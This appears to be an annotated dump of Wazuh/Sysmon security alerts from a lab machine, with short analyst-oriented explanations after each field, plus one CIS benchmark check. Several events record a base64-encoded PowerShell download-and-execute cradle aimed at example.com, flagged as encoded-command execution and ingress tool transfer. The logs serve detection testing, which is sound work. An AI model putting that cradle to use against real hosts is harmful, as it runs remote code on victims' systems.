data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9396 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 40 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1225786 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:39.2679536Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282973 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:39.228
ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ProcessId: 14892
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yre4dc4i.koa.ps1
CreationUtcTime: 2025-04-24 22:36:39.228
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:39.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yre4dc4i.koa.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:39.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 37 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1228555 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:41.9715607Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283043 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:40.440
ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ProcessId: 9540
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ParentProcessId: 14892
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:40.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 41 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1236622 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:42.2552313Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283045 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:42.217
ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ProcessId: 9540
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z1i14jqk.z5t.ps1
CreationUtcTime: 2025-04-24 22:36:42.217
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:42.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z1i14jqk.z5t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:42.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['2.3.10.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1239387 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26042 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 2.3.10.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 38 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1243086 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:44.5117007Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283086 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:43.206
ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ProcessId: 13808
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ParentProcessId: 9540
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:43.206 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
